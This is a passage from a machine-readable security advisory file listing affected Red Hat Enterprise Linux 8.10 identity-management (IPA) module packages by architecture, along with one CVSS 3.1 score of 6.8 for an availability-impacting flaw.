"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0:0.12-3.module+el8.9.0+19692+fac39a03.src::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19634+c162f948.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19692+fac39a03.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-dns-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.src::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.src::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.src::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaserver-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipatests-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-0:5.1-12.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.src::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-0:4.9.13-9.module+el8.10.0+21691+df63127d.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.src::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0:0.12-3.module+el8.9.0+19692+fac39a03.src::idm:client",
